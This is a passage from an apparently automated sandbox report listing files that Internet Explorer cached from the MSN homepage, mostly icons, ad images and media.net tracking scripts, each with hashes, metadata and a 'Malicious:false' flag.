                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...~IDAT8Oc..........8].,.. Z....d..*)..q.!...w10qs0|.r......,..T//`...gx^2..l....'..6.30.G....v.9.....?..g.....y.q....1|\....}._.........g......g.T..>n8....O(..P..L.b..e...+......w.@5 ..L..{...._0..@1.C_.L.;u.L3.03.....{?......G..a.....q......B.........._........i..2......e..|....P.....?/.i..2...p.......P.x;e...go.....|FvV..gc0........*+. 5)...?o>fx^:.,...].4...........".......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBSdFEK[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):229
                                                                                                                                                                                                                      Entropy (8bit):6.32582687955373
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:6v/lhPkR/EhlNkXiuYkCo/Vzj94mmJSUVp:6v/78/IkXiuYNMVjCdSu
                                                                                                                                                                                                                      MD5:9464877AC3BEFD45D26A2C6B47FE193C
                                                                                                                                                                                                                      SHA1:A04A44EA1FE78980E1423755071FF18AD6CE1208
                                                                                                                                                                                                                      SHA-256:9089566EE7142F457AB4D29ED695CDC887A063D1ACECB6C69627F199AFBA5C1C
                                                                                                                                                                                                                      SHA-512:4E58A99FAF309FD60F75AE348D1CEAFDA5E8668AECB3CDBC55E241C98405DC421374B365E4A620632950F9142F8D7A559C15100BD4DE95F4C5A88A11B0C244E7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBSdFEK.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........\.r...zIDAT8Ocd8s.?....J..P\`... ....a....e......f..55.{^^(.;8..3..[P.... ,....g.......bX..-....O8..p...w...(...T0`.3...00....-....u....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\NewErrorPageTemplate[1]
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1612
                                                                                                                                                                                                                      Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                      MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                      SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                      SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                      SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                                                                                                                                                                                                      Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\a8a064[1].gif
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):16360
                                                                                                                                                                                                                      Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                      MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                      SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                      SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                      SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                                                                                                                                                      Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20537
                                                                                                                                                                                                                      Entropy (8bit):5.298678923624999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VpAG36OllD7XFe0uvg2f5vzBgF3OZORQWwY4RXrqt:z93D5GY2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                                                      MD5:52FD0A2A4C4E5C85180A2FE043413909
                                                                                                                                                                                                                      SHA1:E0A437D792E94A4757C8B30002F87945FCEB0796
                                                                                                                                                                                                                      SHA-256:0A71BB24DBFC872D29E85A068497C29769097DDEF8B74F32A21062314DF78AA6
                                                                                                                                                                                                                      SHA-512:4024837A73564E0213258C97C25DEED33E36B4EBF27F1BD01C0F5A3585945D654E3878CF31F11F29BAD05CB176752085D7D2450004C148192362A2AAF1D11CE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":71,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20537
                                                                                                                                                                                                                      Entropy (8bit):5.298678923624999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VpAG36OllD7XFe0uvg2f5vzBgF3OZORQWwY4RXrqt:z93D5GY2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                                                      MD5:52FD0A2A4C4E5C85180A2FE043413909
                                                                                                                                                                                                                      SHA1:E0A437D792E94A4757C8B30002F87945FCEB0796
                                                                                                                                                                                                                      SHA-256:0A71BB24DBFC872D29E85A068497C29769097DDEF8B74F32A21062314DF78AA6
                                                                                                                                                                                                                      SHA-512:4024837A73564E0213258C97C25DEED33E36B4EBF27F1BD01C0F5A3585945D654E3878CF31F11F29BAD05CB176752085D7D2450004C148192362A2AAF1D11CE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":71,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[3].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20537
                                                                                                                                                                                                                      Entropy (8bit):5.298678923624999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VpAG36OllD7XFe0uvg2f5vzBgF3OZORQWwY4RXrqt:z93D5GY2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                                                      MD5:52FD0A2A4C4E5C85180A2FE043413909
                                                                                                                                                                                                                      SHA1:E0A437D792E94A4757C8B30002F87945FCEB0796
                                                                                                                                                                                                                      SHA-256:0A71BB24DBFC872D29E85A068497C29769097DDEF8B74F32A21062314DF78AA6
                                                                                                                                                                                                                      SHA-512:4024837A73564E0213258C97C25DEED33E36B4EBF27F1BD01C0F5A3585945D654E3878CF31F11F29BAD05CB176752085D7D2450004C148192362A2AAF1D11CE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":71,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[4].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20537
                                                                                                                                                                                                                      Entropy (8bit):5.298678923624999
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VpAG36OllD7XFe0uvg2f5vzBgF3OZORQWwY4RXrqt:z93D5GY2RmF3OsRQWwY4RXrqt
                                                                                                                                                                                                                      MD5:52FD0A2A4C4E5C85180A2FE043413909
                                                                                                                                                                                                                      SHA1:E0A437D792E94A4757C8B30002F87945FCEB0796
                                                                                                                                                                                                                      SHA-256:0A71BB24DBFC872D29E85A068497C29769097DDEF8B74F32A21062314DF78AA6
                                                                                                                                                                                                                      SHA-512:4024837A73564E0213258C97C25DEED33E36B4EBF27F1BD01C0F5A3585945D654E3878CF31F11F29BAD05CB176752085D7D2450004C148192362A2AAF1D11CE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":71,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1]
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):748
                                                                                                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\fcmain[1].js
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):38129
                                                                                                                                                                                                                      Entropy (8bit):5.103327618573887
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:01av1Ub8Dn/eeW94hf6OqxYXf9wOBEZn3SQN3GFl295o4lA7Bulos3:EQ1UbOlWmhf6OqxYXf9wOBEZn3SQN3Gy
                                                                                                                                                                                                                      MD5:D5CE3C90DC933B4894B0CC4D526B8111
                                                                                                                                                                                                                      SHA1:385534491DFD2D2E9C87DC3C9FEE72C9092CE990
                                                                                                                                                                                                                      SHA-256:3FDD2AFA5371A84756C3CE5A52200DA4BA0E1591BAC1EF380C6A02B03002256D
                                                                                                                                                                                                                      SHA-512:A3E09CF3D688F0D0A0BDB6CE848852FFCE3F518B206CE5FE5D76E5416EDAE04974F8ED0D210143A8A5A2A22599BC78DDBA00A58608B058C94BFF899C5626FC1B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1605766097714988938&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                                      Preview: ;window._mNDetails.initAd({"vi":"1605766097714988938","s":{"_mNL2":{"size":"306x271","viComp":"1605765377893353874","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305235","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1605766097714988938\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\2bac2dfa2c6662619bff6d55b47d20ea92[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 311x333, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):18903
                                                                                                                                                                                                                      Entropy (8bit):7.917266540836306
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:rLcGI8/3jgBBvG8Z3BuI/6hifbkuX7tV8iIrn2AXASu0Yz3hHhVP:rBIuMXvBqRiDkuLbYbJu0aVP
                                                                                                                                                                                                                      MD5:272794BD74EE5C0432A60FC349904624
                                                                                                                                                                                                                      SHA1:AA9EBB012DBCDDB5EDF56FB0E88FFB7EA14EACC5
                                                                                                                                                                                                                      SHA-256:D4A9775D831C722C3E2841D6F1790DA5A9BD3001F6FFE285C25F0C35C5DCAF1C
                                                                                                                                                                                                                      SHA-512:245CB197D8F04BFF6586E7DDD91CD447E1EFDC209DB5995490FBB7EB254DF2D2D56877DC4EED7448EA541BF6AF937C1A8A7D01D5E9D6D6A3340AA1663265A493
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=333&fit=crop&crop=center&fm=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.....H.H.....@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../..........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\......M.7.."...................................................5h.w....]......b.V..B.b.......X.n.....y...v...6.V..U.JU-\....O...F..Yl.K.......zE..J.S)UT...\....'.X.b.....|.W.65._\k.yJ..U..uKV......,.1f...w..M..6..q...Y..=..I.V.(V.x.. ...&-...7...6.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\7c899940bc66fc80bffd6e3c5d7ea952cc[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 311x333, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):37487
                                                                                                                                                                                                                      Entropy (8bit):7.94488665405086
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:hYybxjjdtUIHeHxFKZUs3ZtODJgo8KlPlCSoBBtF:hnxsIHwFKS2ZtIFPPlCSoTf
                                                                                                                                                                                                                      MD5:C3447E5F4A67C520AC7EF5B20DE66CBD
                                                                                                                                                                                                                      SHA1:1BD5668C4D44501893B0F721958216CF85233360
                                                                                                                                                                                                                      SHA-256:8FBCBDFB68A783417260318BB48009FD8645C838FD5EA79968E184BCEF1DCF11
                                                                                                                                                                                                                      SHA-512:E5A47D5CC5041E37E92BA8A7B095BD138C6A2565E30D2E8AE64F3DB1B86CF0D091ED8DE8B90928A1EB0D1331B36FD5A815AD3BF518BC02A75EC089E31AFEC10E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&h=333&fit=crop&crop=center&fm=jpg&auto=enhance&explore
                                                                                                                                                                                                                      Preview: ......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB10MkbM[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                                                                      Entropy (8bit):7.720280784612809
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:T2PqcKHsgioKpXR3TnVUvPkKWsvIos6z8XYy8xcvn1a:5PZK335UXkJsgIyScf1a
                                                                                                                                                                                                                      MD5:569B24D6D28091EA1F76257B76653A4E
                                                                                                                                                                                                                      SHA1:21B929E4CD215212572753F22E2A534A699F34BE
                                                                                                                                                                                                                      SHA-256:85A236938E00293C63276F2E4949CD51DFF8F37DE95466AD1A571AC8954DB571
                                                                                                                                                                                                                      SHA-512:AE49823EDC6AE98EE814B099A3508BA1EF26A44D0D08E1CCF30CAB009655A7D7A64955A194E5E6240F6806BC0D17E74BD3C4C9998248234CA53104776CC00A01
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v...ZIDAT8OmS[h.g.=s..$n...]7.5..(.&5...D..Z..X..6....O.-.HJm.B..........j..Z,.D.5n.1....^g7;;.;3.w../........}....5....C==}..hd4.OO..^1.I..*.U8.w.B..M0..7}.........J....L.i...T...(J.d*.L..sr.......g?.aL.WC.S..C...(.pl..}[Wc..e.............[...K......<...=S......]..N/.N....(^N'.Lf....X4.....A<#c.....4fL.G..8..m..RYDu.7.>...S....-k.....GO..........R.....5.@.h...Y$..uvpm>(<..q.,.PY....+...BHE..;.M.yJ...U<..S4.j..g....x.............t".....h.....K...~._....:...qg.).~..oy..h..u6....i._n...4T..Z.#.....0....L......l..g!..z...8.I&....,iC.U.V,j_._...9.....8<...A.b.|.^..;..2......./v .....>....O^..;.o...n .'!k\l..C.a.I$8.~.0...4j..~5.\6...z?..s.qx.u....%...@.N.....@..HJh].....l..........#'.r.!../..N.d!m...@.........qV...c..X....t.1CQ..TL....r3.n.."..t.....`...$...ctA....H.p0.0.A..IA.o.5n.m...\.l.B>....x..L.+.H.c6..u...7....`....M....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1aNtPP[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):32571
                                                                                                                                                                                                                      Entropy (8bit):7.940518596946713
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:7Oa/sPw5gNCc8JkeWO03jyqF0qcH9a0A1BTEmz+a+8FYi2q06WJq6:79sY0LeT0zNM9A6l8fqJV
                                                                                                                                                                                                                      MD5:3AD9578F332E52E7803C153BEA0ED7B5
                                                                                                                                                                                                                      SHA1:2C5B078EA877078AC6A81B2DB03CBB0FF525E9E3
                                                                                                                                                                                                                      SHA-256:CE64E5BE39FFC34A32D77C917D970FBC0690AC34CA73B29FB9A68188CCF56B32
